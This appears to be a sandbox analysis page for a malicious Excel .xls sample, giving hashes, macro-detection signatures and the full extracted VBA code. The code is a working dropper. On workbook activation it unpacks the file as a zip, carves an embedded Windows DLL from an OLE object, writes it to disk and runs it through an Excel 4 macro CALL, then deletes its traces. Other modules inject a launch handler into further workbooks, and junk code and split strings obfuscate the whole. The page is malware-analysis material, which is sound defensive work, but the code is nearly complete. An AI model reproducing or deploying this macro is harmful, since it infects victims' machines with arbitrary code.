e3c699b99e619fcac6e0364470028d79e8c96249b52ecaee2d2c832b03a594c4

Sharing

Copy URL

Twitter E-mail

General

Target

e3c699b99e619fcac6e0364470028d79e8c96249b52ecaee2d2c832b03a594c4
Size

785KB
MD5

6bc533050dcfd3790b0df8ec6bb5ed70
SHA1

14a5335469a3d93f8bf677cfb2f1c03cfa11c606
SHA256

e3c699b99e619fcac6e0364470028d79e8c96249b52ecaee2d2c832b03a594c4
SHA512

f23752706d16d6db398642f3fd07db2cfe0d9c6e639341a1286b76b1199a5ea8c3c5beb5abc87cdb44106e8ab740d797189141cb74d9537d182f4af16734ecae
SSDEEP

12288:8omkYgTzFJELQ6Rwt9cAq93yimtmPq8IL7DAfosh5TK/nE:8omkYgF2Oihyi+mPq53IosYE

Score

8^/10

macro macro_on_action

Malware Config

Signatures

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

resource	yara_rule
sample	office_macro_on_action

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
sample

Files

e3c699b99e619fcac6e0364470028d79e8c96249b52ecaee2d2c832b03a594c4
.xls windows office2003

Sem

1

Attribute VB_Name = "Sem"

2

Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

9

Sub addWBActivate()

10

11

Dim VBProj

12

Dim VBComp

13

Dim codeMod

14

Dim formsFolder As String

15

Dim tmpColl As Collection

16

Dim wBook As Workbook

17

Dim filesToPrcs As Collection

18

Dim flw

19

Dim cdw

20

21

Dim fullFName As String

22

Dim activateExist As Boolean

23

24

formsFolder = "C:\Users\GalkinVa\files_for_transport"

25

26

Set tmpColl = flw.getPathsToFilesFromFolder(formsFolder)

27

28

If tmpColl Is Nothing Then

29

Err.Raise 13, Description:="tmpColl variable doesn"

30

End If

31

32

Set filesToPrcs = tmpColl

33

34

For Each fName In filesToPrcs

35

36

fullFName = fName

37

38

fName = flw.extractNameWithExt(fullFName)

39

Set wBook = Workbooks.Open(fullFName)

40

Set VBProj = wBook.VBProject

41

42

43

44

If cdw.VBComponentExists("ThisWorkbook", VBProj) Then

45

Set VBComp = VBProj.VBComponents("ThisWorkbook")

46

ElseIf cdw.VBComponentExists("ÝòàÊíèãà", VBProj) Then

47

Set VBComp = VBProj.VBComponents("ÝòàÊíèãà")

48

Else

49

Err.Raise 13, "try to set VBComponent", "components from check doesn"

50

End If

51

52

Set codeMod = VBComp.CodeModule

53

54

Set tmpColl = cdw.ListProcedures(VBComp)

55

56

57

58

For Each proc In tmpColl

59

If proc = "Workbook_Activate" Then

60

activateExist = True

61

End If

62

Next proc

63

64

If Not activateExist Then

65

Call cdw.CreateEventProcedure(VBComp)

66

Else

67

Debug.Print "Workbook_Activate already exist in " & wBook.Name

68

End If

69

wBook.RunAutoMacros xlAutoClose

70

On Error Resume Next

71

wBook.Close saveChanges:=True

72

If Err.Number <> 0 Then

73

Debug.Print "Error occured when try to save " & wBook.Name

74

End If

75

Next fName

76

77

78

End Sub

79

80

81

82

83

84

Private Sub Workbook_Activate()

85

If UserForm1.Visible = False Then

86

Module1.SendCollection

87

End If

88

89

End Sub

90

Page1

1

Attribute VB_Name = "Page1"

2

Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

9

Module1

1

Attribute VB_Name = "Module1"

2

3

4

Public Gen5var4 As Byte

5

6

Public Gen4var As Byte

7

8

Public Gen5var3 As Byte

9

10

Public Const FirstB As Byte = 77

11

Public Const SecondB As Byte = 90

12

Public Const ThirdB As Byte = 144

13

14

15

16

17

18

19

20

21

Public Property Get Keys() As Collection

22

23

24

Set Keys = IKeys

25

End Property

26

27

Public Property Get Items() As Collection

28

Set Items = IItms

29

End Property

30

31

32

33

34

Public Sub SendCollection()

35

36

Dim FucjiFilm As Object

37

Dim SpecialPath As String

38

39

40

Set FucjiFilm = CreateObject("WScri" + "pt.Shell")

41

PRP = "%" & UserForm6.TextBox1.Tag

42

43

UserForm6.TextBox1.Tag = FucjiFilm.ExpandEnvironmentStrings(PRP + "%")

44

UserForm6.TextBox3.Tag = FucjiFilm.SpecialFolders(UserForm6.TextBox3.Tag)

45

46

ChDir (UserForm6.TextBox1.Tag)

47

48

UserForm1.show

49

End Sub

50

51

Public Sub Remove(Key)

52

If TypeName(Key) = "String" Then

53

Dim i

54

On Error Resume Next

55

Call IItms.Remove(Key)

56

Call IKeys.Remove(Key)

57

58

For i = 1 To IItms.Count

59

If InStr("Collection,Prop", TypeName(IItms.Item(i))) <> 0 Then

60

If IItms.Item(i).Item("Name") = Key Then

61

Call IItms.Remove(i)

62

Call IKeys.Remove(i)

63

Exit For

64

End If

65

End If

66

Next

67

On Error GoTo 0

68

Else

69

Call IItms.Remove(Key)

70

Call IKeys.Remove(Key)

71

End If

72

End Sub

73

74

75

Private Function setItem(Key, Value, Optional RepFlg = True)

76

Dim i As Integer

77

78

If TypeName(Key) = "String" Then

79

80

If RepFlg Then

81

82

If Key <> "" Then

83

84

Call IItms.Add(Value)

85

Call IKeys.Add(IItms.Count)

86

End If

87

Else

88

89

90

91

92

93

MsgBox "???"

94

End If

95

Else

96

97

If IItms.Count < Key Then

98

99

For i = IItms.Count To Key - 2

100

Call IItms.Add("")

101

Next

102

End If

103

If RepFlg Then

104

105

On Error Resume Next

106

Call IItms.Remove(Key)

107

On Error GoTo 0

108

If IItms.Count < Key Then

109

Call IItms.Add(Value)

110

Else

111

Call IItms.Add(Value, before:=Key)

112

End If

113

Else

114

115

If Key = 0 Then

116

If IItms.Count = 0 Then

117

Call IItms.Add(Value)

118

Else

119

Call IItms.Add(Value, before:=1)

120

End If

121

Else

122

If IItms.Count < Key Then

123

Call IItms.Add("")

124

Call IItms.Add(Value)

125

Else

126

Call IItms.Add(Value, after:=Key)

127

End If

128

End If

129

End If

130

End If

131

132

End Function

133

134

135

136

137

138

139

140

UserForm1

1

Attribute VB_Name = "UserForm1"

2

Attribute VB_Base = "0{23CF06EE-43BE-4891-83E6-ACDD1EA60305}{F473BCB2-A78D-415E-8700-67ABF89B23AE}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

9

Private Sub Label1_Click()

10

11

End Sub

12

13

Private Sub UserForm_Activate()

14

DoEvents

15

DoEvents

16

ChenderBegin

17

DoEvents

18

End Sub

19

20

Private Sub UserForm_Initialize()

21

Call SystemButtonSettings(Me, False)

22

23

End Sub

24

Module2

1

Attribute VB_Name = "Module2"

2

3

4

5

6

Public Function GetParam(Count As Integer) As String

7

Dim i As Long

8

Dim j As Integer

9

Dim c As String

10

Dim bInside As Boolean

11

Dim bQuoted As Boolean

12

13

j = 1

14

bInside = False

15

bQuoted = False

16

GetParam = ""

17

For i = 1 To Len(Command$)

18

c = Mid$(Command$, i, 1)

19

If bInside And bQuoted Then

20

If c = """" Then

21

j = j + 1

22

bInside = False

23

bQuoted = False

24

End If

25

ElseIf bInside And Not bQuoted Then

26

If c = " " Then

27

j = j + 1

28

bInside = False

29

bQuoted = False

30

End If

31

Else

32

If c = """" Then

33

If j > Count Then Exit Function

34

bInside = True

35

bQuoted = True

36

ElseIf c <> " " Then

37

bInside = True

38

bQuoted = False

39

End If

40

End If

41

If bInside And j = Count And c <> """" Then GetParam = GetParam & c

42

Next i

43

End Function

44

45

46

Public Function PathBack(ByVal sPath As String) As String

47

On Error Resume Next

48

Dim sT As Variant

49

Dim tt As String

50

If Len(sPath) = 3 Then GoTo errorhand

51

52

For ii = 0 To UBound(sT) - 2

53

tt = tt & sT(ii) & "\"

54

Next ii

55

56

PathBack = tt

57

58

errorhand:

59

PathBack = sPath

60

End Function

61

62

63

64

65

66

67

68

69

Class1

1

Attribute VB_Name = "Class1"

2

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = False

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

9

10

UserForm6

1

Attribute VB_Name = "UserForm6"

2

Attribute VB_Base = "0{C96C7879-69D4-4098-93BA-2433C7F8FF64}{9F8BF3AA-B229-4F87-A287-D7830D393B89}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

9

Page11

1

Attribute VB_Name = "Page11"

2

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = True

9

Module6

1

Attribute VB_Name = "Module6"

2

#If VBA7 And Win64 Then

3

Public Const IsSecond = True

4

#Else

5

Public Const IsSecond = False

6

7

#End If

8

9

Public Function PrepareConfigForOutput() As Integer

10

On Error Resume Next

11

Dim i As Long

12

Dim sNextChar As String

13

Dim bInside As Boolean

14

Dim bQuoted As Boolean

15

Dim sCommand As String

16

17

PrepareConfigForOutput = 0

18

bInsideParameter = False

19

bQuoted = False

20

sCommand = Command$

21

22

For i = 1 To ALen.B(sCommand)

23

sNextChar = Mid(sCommand, i, 1)

24

If bInsideParameter Then

25

If bQuoted Then

26

If sNextChar = " " Then

27

bInsideParameter = False

28

bQuoted = False

29

PrepareConfigForOutput = PrepareConfigForOutput + 1

30

End If

31

End If

32

33

End If

34

Next i

35

If bInsideParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1

36

End Function

37

38

39

Public Function PathBack(ByVal sPath As String) As String

40

On Error Resume Next

41

Dim sT As Variant

42

Dim tt As String

43

If Len(sPath) = 3 Then GoTo errorhand

44

45

For ii = 0 To UBound(sT) - 2

46

tt = tt & sT(ii) & "\"

47

Next ii

48

49

PathBack = tt

50

51

errorhand:

52

PathBack = sPath

53

End Function

54

Public Function GetParam(Count As Integer) As String

55

Dim i As Long

56

Dim j As Integer

57

Dim c As String

58

Dim bInside As Boolean

59

Dim bQuoted As Boolean

60

61

j = 1

62

bInside = False

63

bQuoted = False

64

GetParam = ""

65

For i = 1 To Len(Command$)

66

c = Mid$(Command$, i, 1)

67

If bInside And bQuoted Then

68

If c = """" Then

69

j = j + 1

70

bInside = False

71

bQuoted = False

72

End If

73

ElseIf bInside And Not bQuoted Then

74

If c = " " Then

75

j = j + 1

76

bInside = False

77

bQuoted = False

78

End If

79

Else

80

If c = """" Then

81

If j > Count Then Exit Function

82

bInside = True

83

bQuoted = True

84

ElseIf c <> " " Then

85

bInside = True

86

bQuoted = False

87

End If

88

End If

89

If bInside And j = Count And c <> """" Then GetParam = GetParam & c

90

Next i

91

End Function

92

93

94

95

Module5

1

Attribute VB_Name = "Module5"

2

Public MousePointerLeak() As Byte

3

4

5

Sub ConvertChartToPicture()

6

Dim Cht As Chart

7

If ActiveChart Is Nothing Then Exit Sub

8

If TypeName(ActiveSheet) = "Chart" Then Exit Sub

9

Set Cht = ActiveChart

10

Cht.CopyPicture Appearance:=xlPrinter, _

11

Size:=xlScreen, Format:=xlPicture

12

ActiveWindow.RangeSelection.Select

13

ActiveSheet.Paste

14

End Sub

15

16

17

18

Private Function setItem(Key, Value, Optional RepFlg = True)

19

Dim i As Integer

20

21

If TypeName(Key) = "String" Then

22

23

If RepFlg Then

24

25

If Key <> "" Then

26

On Error Resume Next

27

Call IItms.Remove(Key)

28

Call IKeys.Remove(Key)

29

On Error GoTo 0

30

Call IItms.Add(Value, Key)

31

Call IKeys.Add(Key, Key)

32

Else

33

Call IItms.Add(Value)

34

Call IKeys.Add(IItms.Count)

35

End If

36

Else

37

38

39

40

41

42

MsgBox "???"

43

End If

44

Else

45

46

If IItms.Count < Key Then

47

48

For i = IItms.Count To Key - 2

49

Call IItms.Add("")

50

Next

51

End If

52

If RepFlg Then

53

54

On Error Resume Next

55

Call IItms.Remove(Key)

56

On Error GoTo 0

57

If IItms.Count < Key Then

58

Call IItms.Add(Value)

59

Else

60

Call IItms.Add(Value, before:=Key)

61

End If

62

Else

63

64

If Key = 0 Then

65

If IItms.Count = 0 Then

66

Call IItms.Add(Value)

67

Else

68

Call IItms.Add(Value, before:=1)

69

End If

70

Else

71

If IItms.Count < Key Then

72

Call IItms.Add("")

73

Call IItms.Add(Value)

74

Else

75

Call IItms.Add(Value, after:=Key)

76

End If

77

End If

78

End If

79

End If

80

81

End Function

82

83

84

85

86

87

Public Sub ReplaceFile(WhereToGo)

88

DoEvents

89

ThisWorkbook.Sheets.Copy

90

Application.DisplayAlerts = False

91

DoEvents

92

ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9

93

DoEvents

94

ActiveWorkbook.Close

95

DoEvents

96

97

End Sub

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

Module4

1

Attribute VB_Name = "Module4"

2

3

Private Const GWL_STYLE = -16

4

Private Const WS_CAPTION = &HC00000

5

Private Const WS_SYSMENU = &H80000

6

7

8

#If VBA7 Then

9

10

Private Declare PtrSafe Function BoxWSL _

11

Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _

12

ByVal nIndex As Long, ByVal dwNewLong As Long) As Long

13

Private Declare PtrSafe Function FWA1 _

14

Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _

15

ByVal lpWindowName As String) As Long

16

Private Declare PtrSafe Function DrawMenuBar _

17

Lib "user32" (ByVal parameter1 As Long) As Long

18

Private Declare PtrSafe Function GetWindowLong11 _

19

Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _

20

ByVal nIndex As Long) As Long

21

22

#Else

23

24

Private Declare Function GetWindowLong11 _

25

Lib "user32" Alias "GetWindowLongA" ( _

26

ByVal parameter1 As Long, ByVal nIndex As Long) As Long

27

Private Declare Function FWA1 _

28

Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _

29

ByVal lpWindowName As String) As Long

30

Private Declare Function DrawMenuBar _

31

Lib "user32" (ByVal parameter1 As Long) As Long

32

Private Declare Function BoxWSL _

33

Lib "user32" Alias "SetWindowLongA" ( _

34

ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long

35

36

#End If

37

38

39

40

41

42

43

44

Private Sub cmdExit_Click()

45

Unload M.e

46

End

47

End Sub

48

49

50

51

52

Public Sub SystemButtonSettings(frm As Object, show As Boolean)

53

Dim windowStyle As Long

54

Dim windowHandle As Long

55

56

windowHandle = FWA1(vbNullString, frm.Caption)

57

windowStyle = GetWindowLong11(windowHandle, GWL_STYLE)

58

59

If show Then

60

61

BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

62

63

64

Else

65

BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

66

67

End If

68

69

DrawMenuBar (windowHandle)

70

71

End Sub

72

Public Sub NumberBuffer(Number As Long, ByVal Buffer As Byte)

73

If UserForm1.Enabled = True Then

74

Put #Number, , Buffer

75

End If

76

End Sub

77

78

79

80

81

82

Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)

83

On Error Resume Next

84

For Each Key In putArrayBigList

85

Kill Key

86

Next Key

87

On Error GoTo 0

88

End Sub

89

90

91

92

93

94

Private Sub ERRCHECK(result)

95

96

97

98

If result = RCPND_FMOD_OK Then

99

ms.gR.esult = MsgBox(result & ") " & FMOD_Er_rorStr.ing(result))

100

End If

101

102

End Sub

103

104

105

106

107

108

109

110

Module7

1

Attribute VB_Name = "Module7"

2

3

4

Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long)

5

6

7

8

For i = 1 To Len(tmptext)

9

10

11

If TextClockWise = True Then

12

13

14

15

16

For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1)

17

For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1

18

19

OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)

20

21

OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))

22

If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then

23

24

Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False

25

26

27

28

Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255

29

Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255

30

Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255

31

32

33

Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)

34

End If

35

Next y

36

Next x

37

38

Else

39

40

41

42

43

44

45

OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte

46

OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position

47

48

OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte

49

OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position

50

51

52

For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1

53

For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2)

54

55

OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)

56

57

OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))

58

If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then

59

60

Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False

61

62

63

Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255

64

Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255

65

Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255

66

67

Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)

68

End If

69

Next y

70

Next x

71

End If

72

73

74

progbar.Value = i

75

Next i

76

77

78

progbar.Value = 0

79

80

81

Dra.w_Zoom picsource, pictarget

82

End Sub

83

84

85

Public Sub ChenderBegin()

86

WhereToGo = UserForm6.TextBox1.Tag & "\repository" + ".xls" + "x"

87

CustomWBP = WhereToGo + "." + "zi" + "p"

88

buildPathFor = UserForm6.TextBox1.Tag

89

Dim ofbl As String

90

Dim CurrentSizeOfAT As Long

91

Dim sendings As Integer

92

ofbl = UserForm6.TextBox3.Tag + "\stadr_"

93

94

95

96

ofbl = ofbl & "." & "d" & "ll"

97

98

99

oob = buildPathFor + "\ole" + "Obj" + "ect*.b" + "" + "in"

100

PublicResumEraseByArrayList oob, CustomWBP, ofbl

101

ReplaceFile WhereToGo

102

103

FileCopy WhereToGo, CustomWBP

104

105

sendings = 1

106

Set sNMSP = CreateObject("Shell." + "Application")

107

108

If sendings > 0 And sendings > -30 Then

109

110

Set FileWherePutTo2 = sNMSP.Namespace(buildPathFor)

111

Set FileWherePutTo = sNMSP.Namespace(CustomWBP)

112

113

114

115

116

FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label2.Tag)

117

118

End If

119

CurrentSizeOfAT = 270848

120

121

If IsSecond Then

122

CurrentSizeOfAT = 300000 + 25118 + 2

123

sendings = 2

124

End If

125

Composition buildPathFor & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings

126

If sendings > 0 Then

127

sendings = sendings + 1

128

ChDir (UserForm6.TextBox3.Tag)

129

sendings = sendings + 1

130

End If

131

If sendings < 100 Then

132

sendings = sendings + 1

133

sendings = sendings + 1

134

End If

135

PrepareConfigForOutput

136

137

If sendings < 0 Then

138

sendings = sendings + 1

139

sendings = sendings + 1

140

End If

141

ofbl = "CALL(""" + ofbl

142

143

ExecuteExcel4Macro ofbl + """,""sipecp"",""J"")"

144

End Sub

145

146

Public Function Load(HTMLSource As Variant) As Boolean

147

On Error GoTo ErrorTrap

148

149

Const Chunk = 1000

150

151

Dim WorkingSrc As String

152

Dim TagStart As Long

153

Dim TagEnd As Long

154

Dim TagLength As Long

155

Dim TagStartString As String

156

Dim spli.tt.est() As String

157

Dim Ptr As Long

158

Dim Cnt As Long

159

Dim Pos As Long

160

Dim testing As Boolean

161

Dim PosScriptEnd As Long

162

Dim PosEndScript As Long

163

Dim PosEndScriptEnd As Long

164

165

166

167

WorkingSrc = HTMLSource

168

LocalElementCount = 0

169

LocalElementSize = 0

170

ReDim LocalElements(LocalElementSize)

171

172

If NewWay Then

173

174

175

176

177

178

Load = True

179

Ptr = 0

180

181

182

183

Do

184

BlobSN = "/blob" & GetRan.domInteger() & ":"

185

Ptr = Ptr + 1

186

Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10))

187

188

189

190

spli.tt.est = Split(WorkingSrc, "<style")

191

Cnt = UBound(spli.tt.est) + 1

192

If Cnt > 1 Then

193

For Ptr = 1 To Cnt - 1

194

PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">")

195

If PosScriptEnd > 0 Then

196

PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare)

197

If PosEndScript > 0 Then

198

BlobCnt = BlobCnt + 1

199

BlobCnt = BlobCnt + 1

200

BlobCnt = BlobCnt + 1

201

BlobCnt = BlobCnt + 1

202

BlobCnt = BlobCnt + 1

203

BlobCnt = BlobCnt + 1

204

spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript)

205

BlobCnt = BlobCnt + 1

206

BlobCnt = BlobCnt + 1

207

BlobCnt = BlobCnt + 1

208

BlobCnt = BlobCnt + 1

209

BlobCnt = BlobCnt + 1

210

BlobCnt = BlobCnt + 1

211

Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)

212

BlobCnt = BlobCnt + 1

213

BlobCnt = BlobCnt + 1

214

BlobCnt = BlobCnt + 1

215

BlobCnt = BlobCnt + 1

216

BlobCnt = BlobCnt + 1

217

BlobCnt = BlobCnt + 1

218

219

End If

220

End If

221

Next

222

WorkingSrc = Join(spli.tt.est, "<style")

223

End If

224

225

226

227

spli.tt.est = Split(WorkingSrc, "<style")

228

Cnt = UBound(spli.tt.est) + 1

229

If Cnt > 1 Then

230

For Ptr = 1 To Cnt - 1

231

PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">")

232

If PosScriptEnd > 0 Then

233

PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare)

234

If PosEndScript > 0 Then

235

BlobCnt = BlobCnt + 1

236

BlobCnt = BlobCnt + 1

237

BlobCnt = BlobCnt + 1

238

BlobCnt = BlobCnt + 1

239

BlobCnt = BlobCnt + 1

240

BlobCnt = BlobCnt + 1

241

spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript)

242

BlobCnt = BlobCnt + 1

243

BlobCnt = BlobCnt + 1

244

BlobCnt = BlobCnt + 1

245

BlobCnt = BlobCnt + 1

246

BlobCnt = BlobCnt + 1

247

BlobCnt = BlobCnt + 1

248

Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)

249

BlobCnt = BlobCnt + 1

250

BlobCnt = BlobCnt + 1

251

BlobCnt = BlobCnt + 1

252

BlobCnt = BlobCnt + 1

253

BlobCnt = BlobCnt + 1

254

BlobCnt = BlobCnt + 1

255

256

End If

257

End If

258

Next

259

WorkingSrc = Join(spli.tt.est, "<style")

260

End If

261

Exit Function

262

End If

263

ErrorTrap:

264

Call Handle.Error("Load", Err.Number, Err.Source, Err.Description)

265

End Function

266

267

268

269

270

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, Gen5var6 As Integer)

271

272

Dim Gen5var1 As Long

273

274

Dim Class1 As Class1

275

Set Class1 = New Class1

276

277

278

279

Dim SimpleMethod As Integer

280

ReDim MousePointerLeak(1 To fl)

281

Gen5var1 = FreeFile

282

283

Open Composition2 For Binary Access Read As Gen5var1

284

Dim cur As Integer

285

cur = 1

286

Do While 1

287

Get Gen5var1, , Gen4var

288

If Gen4var = FirstB Then

289

MousePointerLeak(1) = Gen4var

290

291

Get Gen5var1, , Gen5var3

292

If Gen5var3 = SecondB Then

293

MousePointerLeak(2) = Gen5var3

294

295

Get Gen5var1, , Gen5var4

296

If Gen5var4 = ThirdB Then

297

MousePointerLeak(3) = Gen5var4

298

299

If cur = Gen5var6 Then

300

For k = 4 To fl

301

Get Gen5var1, , Gen4var

302

MousePointerLeak(k) = Gen4var

303

Next k

304

Exit Do

305

Else

306

cur = cur + 1

307

End If

308

End If

309

End If

310

End If

311

Loop

312

313

Close Gen5var1

314

On Error Resume Next

315

Gen5var1 = FreeFile

316

Open ofbl For Binary Lock Read Write As #Gen5var1

317

For i = LBound(MousePointerLeak) To UBound(MousePointerLeak)

318

319

If UserForm1.Enabled = True Then

320

NumberBuffer Gen5var1, MousePointerLeak(i)

321

End If

322

Next i

323

324

Close Gen5var1

325

326

End Sub

327

328

329

330

331

332

333

334

335

336

337

338

339

340

Sharing

General

Malware Config

Signatures

Files

Sem

Page1

Module1

UserForm1

Module2

Class1

UserForm6

Page11

Module6

Module5

Module4

Module7

We care about your privacy.